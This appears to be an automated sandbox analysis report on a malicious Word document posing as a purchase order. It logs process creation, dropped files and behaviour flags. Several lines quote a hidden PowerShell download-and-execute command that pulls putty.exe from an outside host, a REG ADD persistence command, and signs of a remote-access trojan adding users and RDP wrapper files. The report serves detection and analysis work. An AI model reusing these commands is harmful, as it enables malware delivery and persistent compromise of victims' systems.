        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\ProgramData\images.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\ProgramData\images.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: images.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: images.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: images.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
        Source: images.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: images.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: images.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: NEW PO1100372954 -.docReversingLabs: Detection: 23%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
        Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
        Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: unknownProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLTJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe' Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe 'C:\Users\user\AppData\Roaming\putty.exe' Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe C:\Users\user\AppData\Roaming\putty.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
        Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
        Source: C:\ProgramData\images.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeProcess created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
        Source: C:\Users\user\AppData\Roaming\putty.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{62BE5D10-60EB-11D0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
        Source: C:\ProgramData\images.exeFile written: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.ini
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: System.Management.Automation.pdbBBfop source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, images.exe
        Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe
        Source: Binary string: wuser32.pdb source: images.exe
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2095090914.00000000021A7000.00000004.00000040.sdmp
        Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2096511156.0000000002960000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2100589485.00000000029A0000.00000002.00000001.sdmp, putty.exe, 0000000A.00000002.2117131809.0000000000770000.00000002.00000001.sdmp

        Data Obfuscation:

        barindex
        Suspicious powershell command line foundShow sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004060B0 LoadLibraryA,GetProcAddress,ExitProcess,13_2_004060B0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_00207735 push esp; retf 10_2_00207736
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002077E1 push cs; retf 10_2_002077E6
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_002084E1 push esp; retf 10_2_002084E2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_00206CC1 push esp; retf 10_2_00206CC2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 10_2_006A0E32 push 00000000h; retn 0010h10_2_006A0E40
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00287735 push esp; retf 11_2_00287736
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_002877E1 push cs; retf 11_2_002877E6
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_002884E1 push esp; retf 11_2_002884E2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_00286CC1 push esp; retf 11_2_00286CC2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004011C0 push eax; ret 13_2_004011D4
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004011C0 push eax; ret 13_2_004011FC
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041C225 pushad ; retn 0041h13_2_0041C22D
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004174D1 push ebp; retf 13_2_00417584
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00417570 push ebp; retf 13_2_00417584
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_004011C0 push eax; ret 15_2_004011D4
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_004011C0 push eax; ret 15_2_004011FC
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0041C225 pushad ; retn 0041h15_2_0041C22D
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_004174D1 push ebp; retf 15_2_00417584
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00417570 push ebp; retf 15_2_00417584
        Source: C:\ProgramData\images.exeCode function: 17_2_00147735 push esp; retf 17_2_00147736
        Source: C:\ProgramData\images.exeCode function: 17_2_00146CC1 push esp; retf 17_2_00146CC2
        Source: C:\ProgramData\images.exeCode function: 17_2_001477E1 push cs; retf 17_2_001477E6
        Source: C:\ProgramData\images.exeCode function: 17_2_001484E1 push esp; retf 17_2_001484E2
        Source: C:\ProgramData\images.exeCode function: 21_3_042A5220 push eax; ret 21_3_042A522D
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51033751288
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51033751288
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51033751288
        Source: initial sampleStatic PE information: section name: .text entropy: 7.51033751288

        Persistence and Installation Behavior:

        barindex
        Tries to download and execute files (via powershell)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''Jump to behavior
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040D2B8 NetUserAdd,NetLocalGroupAddMembers,13_2_0040D2B8
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040290E URLDownloadToFileW,ShellExecuteW,13_2_0040290E
        Source: C:\Users\user\AppData\Roaming\putty.exeFile created: C:\ProgramData\images.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
        Source: C:\ProgramData\images.exeFile created: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeJump to dropped file
        Source: C:\ProgramData\images.exeFile created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to dropped file
        Source: C:\ProgramData\images.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeJump to dropped file
        Source: C:\ProgramData\images.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\putty.exeFile created: C:\ProgramData\images.exeJump to dropped file
        Source: C:\ProgramData\images.exeFile created: C:\Windows\System32\rfxvmt.dllJump to dropped file
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,13_2_0040A36F
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,13_2_00409E2D
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW,13_2_00413695
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_0040A36F lstrcatW,GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,15_2_0040A36F
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00409E2D GetBinaryTypeW,CopyFileW,PathFileExistsW,GetPrivateProfileStringW,15_2_00409E2D
